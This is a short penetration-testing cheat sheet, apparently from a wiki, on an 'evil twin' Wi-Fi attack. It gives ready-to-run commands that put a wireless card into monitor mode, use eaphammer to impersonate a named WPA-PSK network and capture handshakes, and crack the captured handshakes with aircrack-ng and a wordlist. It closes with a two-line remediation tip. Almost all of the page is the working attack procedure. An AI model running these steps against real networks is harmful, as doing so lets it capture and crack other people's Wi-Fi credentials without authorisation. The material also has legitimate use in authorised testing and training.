Evil Twin - Wi-Fi

Evil Twin w/o AP

Preparation

Execution

  1. Monitor mode

ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
  1. Power up the Evil Twin with eaphammer

./eaphammer -i <interface> --channel <channel number> --auth wpa-psk --essid <ssid> --capture-wpa-handshakes yes

example:

./eaphammer -i wlan0 --channel 1 --auth wpa-psk --essid Office1 --capture-wpa-handshakes yes
  1. Crack it

aircrack-ng <handshake file> -w <wordlist>

Note:

If eaphammer are going error, just restart the monitor mode.

this method also effective without mention the channel number, so you just need to specify the SSID

Remediation

It's best to turn off your Wi-Fi when you're not using it.

Avoid using connect automatically.

Last updated